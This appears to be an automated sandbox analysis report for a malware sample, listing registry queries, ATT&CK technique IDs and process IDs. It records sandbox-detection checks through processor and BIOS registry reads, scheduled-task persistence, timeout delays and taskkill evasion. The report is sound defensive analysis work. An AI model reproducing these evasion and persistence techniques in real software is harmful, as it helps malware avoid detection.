Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\CompatibleIDs	insdrv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	insdrv.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	insdrv.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Filters	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\LowerFilters	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	insdrv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	insdrv.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs	insdrv.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Phantom	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Phantom	insdrv.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Service	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Filters	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\LowerFilters	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\CompatibleIDs	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Phantom	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs	insdrv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001	insdrv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Service	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID	insdrv.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Filters	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001	insdrv.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\CompatibleIDs	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Phantom	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\LowerFilters	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID	insdrv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002	insdrv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	explorer.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exe

pid process

6036 schtasks.exe
1488 schtasks.exe
Delays execution with timeout.exe 4 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exe

pid process

3152 timeout.exe
4696 timeout.exe
5800 timeout.exe
5772 timeout.exe
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

wmic.exe

pid process

3052 wmic.exe

pid	process
6036	schtasks.exe
1488	schtasks.exe

pid	process
3152	timeout.exe
4696	timeout.exe
5800	timeout.exe
5772	timeout.exe

pid	process
3052	wmic.exe

Enumerates system info in registry 2 TTPs 29 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exeWINWORD.EXEmsedge.exemsedge.exemsedge.exexcopy.exexcopy.exemsedge.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe

Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command and Scripting Interpreter
T1059

Processes:

ipconfig.exe

pid process

2816 ipconfig.exe
Kills process with taskkill 7 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

2340 taskkill.exe
5932 taskkill.exe
5620 taskkill.exe
2156 taskkill.exe
3456 taskkill.exe
5852 taskkill.exe
1448 taskkill.exe

pid	process
2816	ipconfig.exe

pid	process
2340	taskkill.exe
5932	taskkill.exe
5620	taskkill.exe
2156	taskkill.exe
3456	taskkill.exe
5852	taskkill.exe
1448	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 64 IoCs

adware spyware

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\9\IEPropFontName = "Times New Roman"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\10\IEFixedFontName = "Kokila"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\19\IEPropFontName = "Leelawadee UI"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\35	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\39	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\6\IEPropFontName = "Times New Roman"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\7\IEPropFontName = "Times New Roman"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\13	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\21	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\34\IEFixedFontName = "Iskoola Pota"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\35\IEPropFontName = "Estrangelo Edessa"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\17\IEFixedFontName = "Tunga"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\23\IEPropFontName = "Gulim"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\7\IEFixedFontName = "Times New Roman"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\14\IEPropFontName = "Kalinga"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\31\IEFixedFontName = "Times New Roman"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\38\IEPropFontName = "MV Boli"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\7	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\38	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\13\IEFixedFontName = "Shruti"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\16\IEPropFontName = "Vani"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\22	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\23	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\22\IEPropFontName = "Sylfaen"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\3	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\10	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\33\IEFixedFontName = "Times New Roman"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\34\IEPropFontName = "Iskoola Pota"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\9	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\15	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\34	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\37\IEPropFontName = "Leelawadee UI"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\9\IEFixedFontName = "Courier New"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\18\IEFixedFontName = "Kartika"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\28\IEFixedFontName = "Gadugi"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\8	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\17	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\17\IEPropFontName = "Tunga"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\5\IEFixedFontName = "Courier New"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\16	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\19	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\21\IEPropFontName = "Microsoft Himalaya"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\27\IEFixedFontName = "Ebrima"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\26	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\37\IEFixedFontName = "Leelawadee UI"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\11	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\11\IEPropFontName = "Shonar Bangla"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\16\IEFixedFontName = "Vani"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\30\IEFixedFontName = "Microsoft Yi Baiti"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\13\IEPropFontName = "Shruti"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\24	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\4	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\8\IEPropFontName = "Times New Roman"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\31	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\32\IEPropFontName = "Times New Roman"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\38\IEFixedFontName = "MV Boli"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\11\IEFixedFontName = "Shonar Bangla"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\15\IEFixedFontName = "Vijaya"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\25	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\32\IEFixedFontName = "Times New Roman"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\5	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\15\IEPropFontName = "Vijaya"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\24\IEFixedFontName = "MS Gothic"	reg.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

DrvInst.exeDrvInst.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	DrvInst.exe
